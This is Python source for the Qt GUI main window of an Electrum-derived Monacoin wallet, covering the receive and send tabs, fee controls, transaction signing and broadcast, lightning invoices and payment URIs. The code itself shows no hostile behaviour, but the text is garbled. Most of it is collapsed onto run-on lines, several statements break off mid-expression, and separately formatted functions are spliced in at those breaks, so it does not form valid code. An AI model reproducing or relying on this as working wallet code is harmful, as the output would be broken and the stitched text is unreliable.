grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft) self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None) self.expires_combo = QComboBox() evl = sorted(pr_expiration_values.items()) evl_keys = [i[0] for i in evl] evl_values = [i[1] for i in evl] default_expiry = self.config.get('request_expiry', 3600) try: i = evl_keys.index(default_expiry) except ValueError: i = 0 self.expires_combo.addItems(evl_values) self.expires_combo.setCurrentIndex(i) self.expires_combo.setFixedWidth(self.receive_amount_e.width()) def 
on_expiry(i): self.config.set_key('request_expiry', evl_keys[i]) self.expires_combo.currentIndexChanged.connect(on_expiry) msg = ' '.join([ _('Expiration date of your request.'), _('This information is seen by the recipient if you send them a signed payment request.'), _('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'), _('The bitcoin address never expires and will always be part of this electrum wallet.'), ]) grid.addWidget(HelpLabel(_('Request expires'), msg), 2, 0) grid.addWidget(self.expires_combo, 2, 1) self.expires_label = QLineEdit('') self.expires_label.setReadOnly(1) self.expires_label.setFocusPolicy(Qt.NoFocus) self.expires_label.hide() grid.addWidget(self.expires_label, 2, 1) self.clear_invoice_button = QPushButton(_('Clear')) self.clear_invoice_button.clicked.connect(self.clear_receive_tab) self.create_invoice_button = QPushButton(_('On-chain')) self.create_invoice_button.setIcon(read_QIcon("monacoin.png")) self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False)) self.receive_buttons = buttons = QHBoxLayout() buttons.addStretch(1) buttons.addWidget(self.clear_invoice_button) buttons.addWidget(self.create_invoice_button) if self.config.get('lightning'): self.create_lightning_invoice_button = QPushButton(_('Lightning')) self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png")) self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True)) buttons.addWidget(self.create_lightning_invoice_button) grid.addLayout(buttons, 4, 3, 1, 2) self.receive_address_e = ButtonsTextEdit() self.receive_address_e.addCopyButton(self.app) self.receive_address_e.setReadOnly(True) self.receive_address_e.textChanged.connect(self.update_receive_qr) self.receive_address_e.textChanged.connect(self.update_receive_address_styling) self.receive_address_e.setFocusPolicy(Qt.ClickFocus) self.receive_qr = QRCodeWidget(fixedSize=230) 
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window() self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor)) self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor)) self.receive_requests_label = QLabel(_('Incoming payments')) from .request_list import RequestList self.request_list = RequestList(self) # layout vbox_g = QVBoxLayout() vbox_g.addLayout(grid) vbox_g.addStretch() hbox_r = QHBoxLayout() hbox_r.addWidget(self.receive_qr) hbox_r.addWidget(self.receive_address_e) hbox = QHBoxLayout() hbox.addLayout(vbox_g) hbox.addStretch() hbox.addLayout(hbox_r) w = QWidget() w.searchable_list = self.request_list vbox = QVBoxLayout(w) vbox.addLayout(hbox) vbox.addStretch(1) vbox.addWidget(self.receive_requests_label) vbox.addWidget(self.request_list) vbox.setStretchFactor(self.request_list, 1000) return w def delete_request(self, key): self.wallet.delete_request(key) self.request_list.update() self.clear_receive_tab() def delete_lightning_payreq(self, payreq_key): self.wallet.lnworker.delete_invoice(payreq_key) self.request_list.update() self.invoice_list.update() self.clear_receive_tab() def sign_payment_request(self, addr): alias = self.config.get('alias') alias_privkey = None if alias and self.alias_info: alias_addr, alias_name, validated = self.alias_info if alias_addr: if self.wallet.is_mine(alias_addr): msg = _('This payment request will be signed.') + '\n' + _('Please enter your password') password = None if self.wallet.has_keystore_encryption(): password = self.password_dialog(msg) if not password: return try: self.wallet.sign_payment_request(addr, alias, alias_addr, password) except Exception as e: self.show_error(repr(e)) return else: return def create_invoice(self, is_lightning): amount = self.receive_amount_e.get_amount() message = self.receive_message_e.text() expiry = self.config.get('request_expiry', 3600) if is_lightning: payment_hash = 
def do_copy(self, title, content):
    """Copy *content* to the system clipboard and confirm via a message box,
    labelling the confirmation with *title* (e.g. "Address")."""
    clipboard = self.app.clipboard()
    clipboard.setText(content)
    self.show_message(_("{} copied to clipboard").format(title))
self.show_message(_("Request saved successfully")) self.saved = True def clear_receive_tab(self): self.receive_address_e.setText('') self.receive_message_e.setText('') self.receive_amount_e.setAmount(None) self.expires_label.hide() self.expires_combo.show() def toggle_qr_window(self): from . import qrwindow if not self.qr_window: self.qr_window = qrwindow.QR_Window(self) self.qr_window.setVisible(True) self.qr_window_geometry = self.qr_window.geometry() else: if not self.qr_window.isVisible(): self.qr_window.setVisible(True) self.qr_window.setGeometry(self.qr_window_geometry) else: self.qr_window_geometry = self.qr_window.geometry() self.qr_window.setVisible(False) self.update_receive_qr() def show_send_tab(self): self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab)) def show_receive_tab(self): self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab)) def receive_at(self, addr): if not bitcoin.is_address(addr): return self.show_receive_tab() self.receive_address_e.setText(addr) def update_receive_qr(self): uri = str(self.receive_address_e.text()) self.receive_qr.setData(uri) if self.qr_window and self.qr_window.isVisible(): self.qr_window.qrw.setData(uri) def update_receive_address_styling(self): addr = str(self.receive_address_e.text()) # note: 'addr' could be ln invoice or BIP21 URI try: uri = util.parse_URI(addr) except InvalidBitcoinURI: pass else: addr = uri.get('address') if is_address(addr) and self.wallet.is_used(addr): self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True)) self.receive_address_e.setToolTip(_("This address has already been used. " "For better privacy, do not reuse it for new payments.")) else: self.receive_address_e.setStyleSheet("") self.receive_address_e.setToolTip("") def set_feerounding_text(self, num_satoshis_added): self.feerounding_text = (_('Additional {} satoshis are going to be added.') .format(num_satoshis_added)) def create_send_tab(self): # A 4-column grid layout. 
All the stretch is in the last column. # The exchange rate plugin adds a fiat widget in column 2 self.send_grid = grid = QGridLayout() grid.setSpacing(8) grid.setColumnStretch(3, 1) from .paytoedit import PayToEdit self.amount_e = BTCAmountEdit(self.get_decimal_point) self.payto_e = PayToEdit(self) msg = _('Recipient of the funds.') + '\n\n'\ + _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)') payto_label = HelpLabel(_('Pay to'), msg) grid.addWidget(payto_label, 1, 0) grid.addWidget(self.payto_e, 1, 1, 1, -1) completer = QCompleter() completer.setCaseSensitivity(False) self.payto_e.set_completer(completer) completer.setModel(self.completions) msg = _('Description of the transaction (not mandatory).') + '\n\n'\ + _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.') description_label = HelpLabel(_('Description'), msg) grid.addWidget(description_label, 2, 0) self.message_e = MyLineEdit() grid.addWidget(self.message_e, 2, 1, 1, -1) msg = _('Amount to be sent.') + '\n\n' \ + _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \ + _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \ + _('Keyboard shortcut: type "!" 
to send all your coins.') amount_label = HelpLabel(_('Amount'), msg) grid.addWidget(amount_label, 3, 0) grid.addWidget(self.amount_e, 3, 1) self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '') if not self.fx or not self.fx.is_enabled(): self.fiat_send_e.setVisible(False) grid.addWidget(self.fiat_send_e, 3, 2) self.amount_e.frozen.connect( lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly())) self.max_button = EnterButton(_("Max"), self.spend_max) self.max_button.setFixedWidth(self.amount_e.width()) self.max_button.setCheckable(True) grid.addWidget(self.max_button, 3, 3) hbox = QHBoxLayout() hbox.addStretch(1) grid.addLayout(hbox, 3, 4) self.from_label = QLabel(_('From')) grid.addWidget(self.from_label, 4, 0) self.from_list = FromList(self, self.from_list_menu) grid.addWidget(self.from_list, 4, 1, 1, -1) self.set_pay_from([]) msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\ + _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\ + _('A suggested fee is automatically added to this field. You may override it. 
The suggested fee increases with the size of the transaction.') self.fee_e_label = HelpLabel(_('Fee'), msg) def fee_cb(dyn, pos, fee_rate): if dyn: if self.config.use_mempool_fees(): self.config.set_key('depth_level', pos, False) else: self.config.set_key('fee_level', pos, False) else: self.config.set_key('fee_per_kb', fee_rate, False) if fee_rate: fee_rate = Decimal(fee_rate) self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000)) else: self.feerate_e.setAmount(None) self.fee_e.setModified(False) self.fee_slider.activate() self.spend_max() if self.max_button.isChecked() else self.update_fee() self.fee_slider = FeeSlider(self, self.config, fee_cb) self.fee_slider.setFixedWidth(self.amount_e.width()) def on_fee_or_feerate(edit_changed, editing_finished): edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e if editing_finished: if edit_changed.get_amount() is None: # This is so that when the user blanks the fee and moves on, # we go back to auto-calculate mode and put a fee back. 
edit_changed.setModified(False) else: # edit_changed was edited just now, so make sure we will # freeze the correct fee setting (this) edit_other.setModified(False) self.fee_slider.deactivate() self.update_fee() class TxSizeLabel(QLabel): def setAmount(self, byte_size): self.setText(('x %s bytes =' % byte_size) if byte_size else '') self.size_e = TxSizeLabel() self.size_e.setAlignment(Qt.AlignCenter) self.size_e.setAmount(0) self.size_e.setFixedWidth(self.amount_e.width()) self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet()) self.feerate_e = FeerateEdit(lambda: 0) self.feerate_e.setAmount(self.config.fee_per_byte()) self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False)) self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True)) self.fee_e = BTCAmountEdit(self.get_decimal_point) self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False)) self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True)) def feerounding_onclick(): text = (self.feerounding_text + '\n\n' + _('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' + _('At most 100 satoshis might be lost due to this rounding.') + ' ' + _("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' + _('Also, dust is not kept as change, but added to the fee.') + '\n' + _('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.')) self.show_message(title=_('Fee rounding'), msg=text) self.feerounding_icon = QPushButton(read_QIcon('info.png'), '') self.feerounding_icon.setFixedWidth(round(2.2 * char_width_in_lineedit())) self.feerounding_icon.setFlat(True) self.feerounding_icon.clicked.connect(feerounding_onclick) self.feerounding_icon.setVisible(False) self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e) vbox_feelabel = QVBoxLayout() vbox_feelabel.addWidget(self.fee_e_label) 
vbox_feelabel.addStretch(1) grid.addLayout(vbox_feelabel, 5, 0) self.fee_adv_controls = QWidget() hbox = QHBoxLayout(self.fee_adv_controls) hbox.setContentsMargins(0, 0, 0, 0) hbox.addWidget(self.feerate_e) hbox.addWidget(self.size_e) hbox.addWidget(self.fee_e) hbox.addWidget(self.feerounding_icon, Qt.AlignLeft) hbox.addStretch(1) self.feecontrol_fields = QWidget() vbox_feecontrol = QVBoxLayout(self.feecontrol_fields) vbox_feecontrol.setContentsMargins(0, 0, 0, 0) vbox_feecontrol.addWidget(self.fee_adv_controls) vbox_feecontrol.addWidget(self.fee_slider) grid.addWidget(self.feecontrol_fields, 5, 1, 1, -1) if not self.config.get('show_fee', False): self.fee_adv_controls.setVisible(False) self.save_button = EnterButton(_("Save"), self.do_save_invoice) self.preview_button = EnterButton(_("Preview"), self.do_preview) self.preview_button.setToolTip(_('Display the details of your transaction before signing it.')) self.send_button = EnterButton(_("Send"), self.do_pay) self.clear_button = EnterButton(_("Clear"), self.do_clear) buttons = QHBoxLayout() buttons.addStretch(1) buttons.addWidget(self.save_button) buttons.addWidget(self.clear_button) buttons.addWidget(self.preview_button) buttons.addWidget(self.send_button) grid.addLayout(buttons, 6, 1, 1, 3) self.amount_e.shortcut.connect(self.spend_max) self.payto_e.textChanged.connect(self.update_fee) self.amount_e.textEdited.connect(self.update_fee) def reset_max(text): self.max_button.setChecked(False) enable = not bool(text) and not self.amount_e.isReadOnly() #self.max_button.setEnabled(enable) self.amount_e.textEdited.connect(reset_max) self.fiat_send_e.textEdited.connect(reset_max) def entry_changed(): text = "" amt_color = ColorScheme.DEFAULT fee_color = ColorScheme.DEFAULT feerate_color = ColorScheme.DEFAULT if self.not_enough_funds: amt_color, fee_color = ColorScheme.RED, ColorScheme.RED feerate_color = ColorScheme.RED text = _("Not enough funds") c, u, x = self.wallet.get_frozen_balance() if c+u+x: text += " ({} {} 
def spend_max(self):
    """Switch the Send tab into 'spend maximum' mode and recompute the fee.

    Plugins may veto via the 'abort_send' hook (e.g. two-factor wallets).
    """
    aborted = run_hook('abort_send', self)
    if aborted:
        return
    self.max_button.setChecked(True)
    self.do_update_fee()
if self.max_button.isChecked() else self.amount_e.get_amount() if amount is None: if not freeze_fee: self.fee_e.setAmount(None) self.not_enough_funds = False self.statusBar().showMessage('') return outputs = self.read_outputs() fee_estimator = self.get_send_fee_estimator() coins = self.get_coins() if not outputs: _type, addr = self.get_payto_or_dummy() outputs = [TxOutput(_type, addr, amount)] is_sweep = bool(self.tx_external_keypairs) make_tx = lambda fee_est: \ self.wallet.make_unsigned_transaction( coins, outputs, fixed_fee=fee_est, is_sweep=is_sweep) try: tx = make_tx(fee_estimator) self.not_enough_funds = False except (NotEnoughFunds, NoDynamicFeeEstimates) as e: if not freeze_fee: self.fee_e.setAmount(None) if not freeze_feerate: self.feerate_e.setAmount(None) self.feerounding_icon.setVisible(False) if isinstance(e, NotEnoughFunds): self.not_enough_funds = True elif isinstance(e, NoDynamicFeeEstimates): try: tx = make_tx(0) size = tx.estimated_size() self.size_e.setAmount(size) except BaseException: pass return except BaseException: self.logger.exception('') return size = tx.estimated_size() self.size_e.setAmount(size) fee = tx.get_fee() fee = None if self.not_enough_funds else fee # Displayed fee/fee_rate values are set according to user input. # Due to rounding or dropping dust in CoinChooser, # actual fees often differ somewhat. 
def from_list_delete(self, item):
    """Remove the coin backing *item* from the manual coin selection,
    then redraw the 'From' list and recompute the fee."""
    idx = self.from_list.indexOfTopLevelItem(item)
    del self.pay_from[idx]
    self.redraw_from_list()
    self.update_fee()
+ h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address') for item in self.pay_from: self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ])) def get_contact_payto(self, key): _type, label = self.contacts.get(key) return label + ' <' + key + '>' if _type == 'address' else key def update_completions(self): l = [self.get_contact_payto(key) for key in self.contacts.keys()] self.completions.setStringList(l) def protected(func): '''Password request wrapper. The password is passed to the function as the 'password' named argument. "None" indicates either an unencrypted wallet, or the user cancelled the password request. An empty input is passed as the empty string.''' def request_password(self, *args, **kwargs): parent = self.top_level_window() password = None while self.wallet.has_keystore_encryption(): password = self.password_dialog(parent=parent) if password is None: # User cancelled password input return try: self.wallet.check_password(password) break except Exception as e: self.show_error(str(e), parent=parent) continue kwargs['password'] = password return func(self, *args, **kwargs) return request_password @protected def protect(self, func, args, password): return func(*args, password) def is_send_fee_frozen(self): return self.fee_e.isVisible() and self.fee_e.isModified() \ and (self.fee_e.text() or self.fee_e.hasFocus()) def is_send_feerate_frozen(self): return self.feerate_e.isVisible() and self.feerate_e.isModified() \ and (self.feerate_e.text() or self.feerate_e.hasFocus()) def get_send_fee_estimator(self): if self.is_send_fee_frozen(): fee_estimator = self.fee_e.get_amount() elif self.is_send_feerate_frozen(): amount = self.feerate_e.get_amount() # sat/byte feerate amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate fee_estimator = partial( simple_config.SimpleConfig.estimate_fee_for_feerate, amount) else: fee_estimator = None return fee_estimator def read_outputs(self): if 
self.payment_request: outputs = self.payment_request.get_outputs() else: outputs = self.payto_e.get_outputs(self.max_button.isChecked()) return outputs def check_send_tab_outputs_and_show_errors(self, outputs) -> bool: """Returns whether there are errors with outputs. Also shows error dialog to user if so. """ pr = self.payment_request if pr: if pr.has_expired(): self.show_error(_('Payment request has expired')) return True if not pr: errors = self.payto_e.get_errors() if errors: self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors])) return True if self.payto_e.is_alias and self.payto_e.validated is False: alias = self.payto_e.toPlainText() msg = _('WARNING: the alias "{}" could not be validated via an additional ' 'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n' msg += _('Do you wish to continue?') if not self.question(msg): return True if not outputs: self.show_error(_('No outputs')) return True for o in outputs: if o.address is None: self.show_error(_('Bitcoin Address is None')) return True if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address): self.show_error(_('Invalid Bitcoin Address')) return True if o.value is None: self.show_error(_('Invalid Amount')) return True return False # no errors def pay_lightning_invoice(self, invoice): amount_sat = self.amount_e.get_amount() attempts = LN_NUM_PAYMENT_ATTEMPTS def task(): self.wallet.lnworker.pay(invoice, amount_sat, attempts) self.do_clear() self.wallet.thread.add(task) self.invoice_list.update() def on_payment_status(self, key, status, *args): # todo: check that key is in this wallet's invoice list self.invoice_list.update() if status == 'success': self.show_message(_('Payment succeeded')) self.need_update.set() elif status == 'progress': print('on_payment_status', key, status, args) elif status == 'failure': self.show_info(_('Payment failed')) elif status == 'error': e = args[0] 
self.show_error(_('Error') + '\n' + str(e)) def read_invoice(self): message = self.message_e.text() amount = self.amount_e.get_amount() if not self.is_onchain: return { 'type': PR_TYPE_LN, 'invoice': self.payto_e.lightning_invoice, 'amount': amount, 'message': message, } else: outputs = self.read_outputs() if self.check_send_tab_outputs_and_show_errors(outputs): return return self.wallet.create_invoice(outputs, message, self.payment_request, self.payto_URI) def do_save_invoice(self): invoice = self.read_invoice() if not invoice: return self.wallet.save_invoice(invoice) self.do_clear() self.invoice_list.update() def do_preview(self): self.do_pay(preview=True) def do_pay(self, preview=False): invoice = self.read_invoice() if not invoice: return if not preview: self.wallet.save_invoice(invoice) self.do_clear() self.invoice_list.update() self.do_pay_invoice(invoice, preview) def do_pay_invoice(self, invoice, preview=False): if invoice['type'] == PR_TYPE_LN: self.pay_lightning_invoice(self.payto_e.lightning_invoice) return elif invoice['type'] == PR_TYPE_ONCHAIN: message = invoice['message'] outputs = invoice['outputs'] else: raise Exception('unknown invoice type') if run_hook('abort_send', self): return outputs = [TxOutput(*x) for x in outputs] fee_estimator = self.get_send_fee_estimator() coins = self.get_coins() try: is_sweep = bool(self.tx_external_keypairs) tx = self.wallet.make_unsigned_transaction( coins, outputs, fixed_fee=fee_estimator, is_sweep=is_sweep) except (NotEnoughFunds, NoDynamicFeeEstimates) as e: self.show_message(str(e)) return except InternalAddressCorruption as e: self.show_error(str(e)) raise except BaseException as e: self.logger.exception('') self.show_message(str(e)) return amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x: x.value, outputs)) fee = tx.get_fee() #use_rbf = bool(self.config.get('use_rbf', True)) #if use_rbf: # tx.set_rbf(True) if fee < self.wallet.relayfee() * tx.estimated_size() / 1000: 
            self.show_error('\n'.join([
                _("This transaction requires a higher fee, or it will not be propagated by your current server"),
                _("Try to raise your transaction fee, or use a server with a lower relay fee.")
            ]))
            return

        if preview:
            self.show_transaction(tx, message)
            return

        if not self.network:
            self.show_error(_("You can't broadcast a transaction without a live network connection."))
            return

        # confirmation dialog
        msg = [
            _("Amount to be sent") + ": " + self.format_amount_and_units(amount),
            _("Mining fee") + ": " + self.format_amount_and_units(fee),
        ]

        x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
        if x_fee:
            x_fee_address, x_fee_amount = x_fee
            msg.append(_("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount))

        feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
        if fee > feerate_warning * tx.estimated_size() / 1000:
            msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))

        if self.wallet.has_keystore_encryption():
            msg.append("")
            msg.append(_("Enter your password to proceed"))
            password = self.password_dialog('\n'.join(msg))
            if not password:
                return
        else:
            msg.append(_('Proceed?'))
            password = None
            if not self.question('\n'.join(msg)):
                return

        def sign_done(success):
            # Incomplete (e.g. multisig) txs are shown for further signing;
            # complete ones are broadcast immediately.
            if success:
                if not tx.is_complete():
                    self.show_transaction(tx)
                    self.do_clear()
                else:
                    self.broadcast_transaction(tx, message)
        self.sign_tx_with_password(tx, sign_done, password)

    @protected
    def sign_tx(self, tx, callback, password):
        self.sign_tx_with_password(tx, callback, password)

    def sign_tx_with_password(self, tx, callback, password):
        '''Sign the transaction in a separate thread.  When done, calls
        the callback with a success code of True or False.
        '''
        def on_success(result):
            callback(True)
        def on_failure(exc_info):
            self.on_error(exc_info)
            callback(False)
        # Plugins (e.g. TrustedCoin) may wrap the success handler.
        on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
        if self.tx_external_keypairs:
            # can sign directly
            task = partial(Transaction.sign, tx, self.tx_external_keypairs)
        else:
            task = partial(self.wallet.sign_transaction, tx, password)
        msg = _('Signing transaction...')
        WaitingDialog(self, msg, task, on_success, on_failure)

    def broadcast_transaction(self, tx, tx_desc):
        """Broadcast tx on a worker thread and report the result in the GUI thread."""

        def broadcast_thread():
            # non-GUI thread
            pr = self.payment_request
            if pr and pr.has_expired():
                self.payment_request = None
                return False, _("Payment request has expired")
            status = False
            try:
                self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
            except TxBroadcastError as e:
                msg = e.get_message_for_gui()
            except BestEffortRequestFailed as e:
                msg = repr(e)
            else:
                status, msg = True, tx.txid()
            if pr and status is True:
                # BIP70 flow: notify the merchant and wait for the payment ACK.
                key = pr.get_id()
                #self.wallet.set_invoice_paid(key, tx.txid())
                self.payment_request = None
                refund_address = self.wallet.get_receiving_address()
                coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
                fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
                ack_status, ack_msg = fut.result(timeout=20)
                self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
            return status, msg

        # Capture current TL window; override might be removed on return
        parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))

        def broadcast_done(result):
            # GUI thread
            if result:
                status, msg = result
                if status:
                    if tx_desc is not None and tx.is_complete():
                        self.wallet.set_label(tx.txid(), tx_desc)
                    parent.show_message(_('Payment sent.') + '\n' + msg)
                    self.invoice_list.update()
                    self.do_clear()
                else:
                    msg = msg or ''
                    parent.show_error(msg)

        WaitingDialog(self, _('Broadcasting transaction...'),
                      broadcast_thread, broadcast_done, self.on_error)

    @protected
    def open_channel(self, *args, **kwargs):
        """Open a lightning channel in the background; args are forwarded to lnworker."""
        def task():
            return self.wallet.lnworker.open_channel(*args, **kwargs)
        def on_success(chan):
            n = chan.constraints.funding_txn_minimum_depth
            message = '\n'.join([
                _('Channel established.'),
                _('Remote peer ID') + ':' + chan.node_id.hex(),
                _('This channel will be usable after {} confirmations').format(n)
            ])
            self.show_message(message)
        def on_failure(exc_info):
            type_, e, traceback = exc_info
            self.show_error(_('Could not open channel: {}').format(e))
        WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure)

    def query_choice(self, msg, choices):
        # Needed by QtHandler for hardware wallets
        dialog = WindowModalDialog(self.top_level_window())
        clayout = ChoicesLayout(msg, choices)
        vbox = QVBoxLayout(dialog)
        vbox.addLayout(clayout.layout())
        vbox.addLayout(Buttons(OkButton(dialog)))
        if not dialog.exec_():
            return None
        return clayout.selected_index()

    def lock_amount(self, b):
        """Freeze/unfreeze the amount field (the Max button is disabled while frozen)."""
        self.amount_e.setFrozen(b)
        self.max_button.setEnabled(not b)

    def prepare_for_payment_request(self):
        """Put the send tab into payment-request mode: freeze fields until the PR loads."""
        self.show_send_tab()
        self.payto_e.is_pr = True
        for e in [self.payto_e, self.message_e]:
            e.setFrozen(True)
        self.lock_amount(True)
        self.payto_e.setText(_("please wait..."))
        return True

    def delete_invoice(self, key):
        self.wallet.delete_invoice(key)
        self.invoice_list.update()

    def payment_request_ok(self):
        """Populate the send tab after a payment request verified successfully."""
        pr = self.payment_request
        if not pr:
            return
        key = pr.get_id()
        invoice = self.wallet.get_invoice(key)
        if invoice and invoice['status'] == PR_PAID:
            self.show_message("invoice already paid")
            self.do_clear()
            self.payment_request = None
            return
        self.payto_e.is_pr = True
        if not pr.has_expired():
            self.payto_e.setGreen()
        else:
            self.payto_e.setExpired()
        self.payto_e.setText(pr.get_requestor())
        self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
        self.message_e.setText(pr.get_memo())
        # signal to set fee
        self.amount_e.textEdited.emit("")

    def payment_request_error(self):
        """Report a failed payment request and reset the send tab."""
        pr = self.payment_request
        if not pr:
            return
        self.show_message(pr.error)
        self.payment_request = None
        self.do_clear()

    def on_pr(self, request):
        # Runs off the GUI thread; hand off to the GUI via signals.
        self.payment_request = request
        if self.payment_request.verify(self.contacts):
            self.payment_request_ok_signal.emit()
        else:
            self.payment_request_error_signal.emit()

    def parse_lightning_invoice(self, invoice):
        """Decode a BOLT11 invoice and fill the send tab (payee key, description, amount)."""
        from electrum_mona.lnaddr import lndecode
        lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
        pubkey = bh2u(lnaddr.pubkey.serialize())
        # 'd' is the BOLT11 description tag; default to empty if absent.
        for k,v in lnaddr.tags:
            if k == 'd':
                description = v
                break
        else:
            description = ''
        self.payto_e.setFrozen(True)
        self.payto_e.setText(pubkey)
        self.message_e.setText(description)
        if lnaddr.amount is not None:
            self.amount_e.setAmount(lnaddr.amount * COIN)
        #self.amount_e.textEdited.emit("")
        self.set_onchain(False)

    def set_onchain(self, b):
        """Toggle the send tab between on-chain (True) and lightning (False) mode."""
        self.is_onchain = b
        self.preview_button.setEnabled(b)
        self.max_button.setEnabled(b)
        self.show_send_tab_onchain_fees(b)

    def show_send_tab_onchain_fees(self, b: bool):
        self.feecontrol_fields.setVisible(b)
        self.fee_e_label.setVisible(b)

    def pay_to_URI(self, URI):
        """Handle a monacoin: URI — either start a payment-request fetch or
        pre-fill address/amount/message in the send tab."""
        if not URI:
            return
        try:
            out = util.parse_URI(URI, self.on_pr)
        except InvalidBitcoinURI as e:
            self.show_error(_("Error parsing URI") + f":\n{e}")
            return
        self.show_send_tab()
        self.payto_URI = out
        r = out.get('r')
        sig = out.get('sig')
        name = out.get('name')
        if r or (name and sig):
            self.prepare_for_payment_request()
            return
        address = out.get('address')
        amount = out.get('amount')
        label = out.get('label')
        message = out.get('message')
        # use label as description (not BIP21 compliant)
        if label and not message:
            message = label
        if address:
            self.payto_e.setText(address)
        if message:
            self.message_e.setText(message)
        if amount:
            self.amount_e.setAmount(amount)
            self.amount_e.textEdited.emit("")

    def do_clear(self):
        """Reset the entire send tab to its default state."""
        self.max_button.setChecked(False)
        self.not_enough_funds = False
        self.payment_request = None
        self.payto_URI = None
        self.payto_e.is_pr = False
        self.is_onchain = False
        self.set_onchain(False)
        for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
                  self.fee_e, self.feerate_e]:
            e.setText('')
            e.setFrozen(False)
        self.fee_slider.activate()
        self.feerate_e.setAmount(self.config.fee_per_byte())
        self.size_e.setAmount(0)
        self.feerounding_icon.setVisible(False)
        self.set_pay_from([])
        self.tx_external_keypairs = {}
        self.update_status()
        run_hook('do_clear', self)

    def set_frozen_state_of_addresses(self, addrs, freeze: bool):
        self.wallet.set_frozen_state_of_addresses(addrs, freeze)
        self.address_list.update()
        self.utxo_list.update()
        self.update_fee()

    def set_frozen_state_of_coins(self, utxos, freeze: bool):
        self.wallet.set_frozen_state_of_coins(utxos, freeze)
        self.utxo_list.update()
        self.update_fee()

    def create_list_tab(self, l, toolbar=None):
        """Wrap a list widget (plus optional toolbar) in a searchable tab container."""
        w = QWidget()
        w.searchable_list = l
        vbox = QVBoxLayout()
        w.setLayout(vbox)
        #vbox.setContentsMargins(0, 0, 0, 0)
        #vbox.setSpacing(0)
        if toolbar:
            vbox.addLayout(toolbar)
        vbox.addWidget(l)
        return w

    def create_addresses_tab(self):
        from .address_list import AddressList
        self.address_list = l = AddressList(self)
        toolbar = l.create_toolbar(self.config)
        toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
        l.show_toolbar(toolbar_shown)
        return self.create_list_tab(l, toolbar)

    def create_utxo_tab(self):
        from .utxo_list import UTXOList
        self.utxo_list = l = UTXOList(self)
        return self.create_list_tab(l)

    def create_contacts_tab(self):
        from .contact_list import ContactList
self.contact_list = l = ContactList(self) return self.create_list_tab(l) def remove_address(self, addr): if self.question(_("Do you want to remove {} from your wallet?").format(addr)): self.wallet.delete_address(addr) self.need_update.set() # history, addresses, coins self.clear_receive_tab() def get_coins(self): if self.pay_from: return self.pay_from else: return self.wallet.get_spendable_coins(None) def spend_coins(self, coins): self.set_pay_from(coins) self.set_onchain(len(coins) > 0) self.show_send_tab() self.update_fee() def paytomany(self): self.show_send_tab() self.payto_e.paytomany() msg = '\n'.join([ _('Enter a list of outputs in the \'Pay to\' field.'), _('One output per line.'), _('Format: address, amount'), _('You may load a CSV file using the file icon.') ]) self.show_message(msg, title=_('Pay to many')) def payto_contacts(self, labels): paytos = [self.get_contact_payto(label) for label in labels] self.show_send_tab() if len(paytos) == 1: self.payto_e.setText(paytos[0]) self.amount_e.setFocus() else: text = "\n".join([payto + ", 0" for payto in paytos]) self.payto_e.setText(text) self.payto_e.setFocus() def set_contact(self, label, address): if not is_address(address): self.show_error(_('Invalid Address')) self.contact_list.update() # Displays original unchanged value return False self.contacts[address] = ('address', 